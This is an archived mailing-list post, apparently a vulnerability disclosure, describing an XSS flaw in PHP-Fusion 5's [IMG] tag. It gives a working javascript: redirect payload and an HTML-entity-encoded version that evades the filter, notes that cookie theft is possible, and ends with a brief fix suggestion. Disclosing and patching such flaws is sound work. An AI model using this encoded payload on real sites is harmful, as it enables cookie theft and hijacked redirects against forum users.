PHP-FUSION 5.* XSS VULNERABILITY

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 


I found an exploit in the current version of php-fusion which allows you to input XSS in the [IMG] tag. I reported it already to php-fusion and they created a fix for this. Here it goes:

By converting the text (ie. javascript:alert('test')) to their ascii values, the strings between the [img][/img] tags aren't checked by the filter. And this way, you can send it and it will be executed.

You can do other things like display cookies, steal cookies, redirections etc.

EXAMPLE:

[IMG]javascript:document.location='http://www.albinoblacksheep.com/flash/you.html'[/IMG]

would be replaced by

[IMG]&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#100&#111&#99&#117&#109&#101&#110&#116&#46&#108&#111&#99&#97&#116&#105&#111&#110&#61&#39&#104&#116&#116&#112&#58&#47&#47&#119&#119&#119&#46&#97&#108&#98&#105&#110&#111&#98&#108&#97&#99&#107&#115&#104&#101&#101&#112&#46&#99&#111&#109&#47&#102&#108&#97&#115&#104&#47&#121&#111&#117&#46&#104&#116&#109&#108&#39[/IMG]

FIX:

Filter out characters like '&' and '#'.
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux